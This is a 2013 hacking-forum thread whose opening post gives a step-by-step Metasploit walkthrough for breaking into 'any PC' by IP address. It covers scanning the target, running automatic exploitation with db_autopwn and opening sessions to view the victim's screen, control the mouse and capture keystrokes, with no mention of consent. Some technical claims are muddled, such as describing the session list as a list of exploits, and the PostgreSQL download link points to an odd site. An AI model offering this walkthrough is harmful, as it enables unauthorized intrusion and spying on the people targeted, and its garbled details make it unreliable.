Hack any PC using IP via Metasploit

Discussion in 'Scripts & Commands' started by Musadiq, 8 Oct 2013.

  1. Musadiq

    Musadiq Active Member

    Joined:
    26 Jan 2013
    Messages:
    7
    Likes Received:
    0
    Trophy Points:
    41
    1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.

    2.) You need PostgrSQL for your database.
    Download here:http://www.ihelpgadget.com/
    Make sure you use all the defaults or Metasploit woun't work!

    3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III).
    Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

    4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui.

    5.)Now, in the window type:

    db_connect postgres:ThePassYouChose@localhost:5432

    The first time you do this you will see lots of text flash buy. Don't worry, this is normal.

    6.)Type db_host to make sure you are connected correctly.

    7.)Now type this:

    db_nmap 000.000.000.000

    Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

    8.) Now we get to the fun part; the automatic exploitation.
    Just type db_autopwn -t -p -e -s -b ,
    watch the auto-exploitation start, go play Halo for a while, and then come back...

    9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

    10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:

    sessions -i ExploitNumber

    The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.

    For more Content visit www.hacktheway.org
     
  2. farzin

    farzin Active Member

    Joined:
    4 Oct 2013
    Messages:
    2
    Likes Received:
    0
    Trophy Points:
    31
  3. nilesthorn

    nilesthorn Member

    Joined:
    31 Oct 2013
    Messages:
    20
    Likes Received:
    2
    Trophy Points:
    18
    Mr. Musadiq that's amazing do you have step by step tutorial regarding how to use Metasploit? thanks in advance
     
Loading...
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.


    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K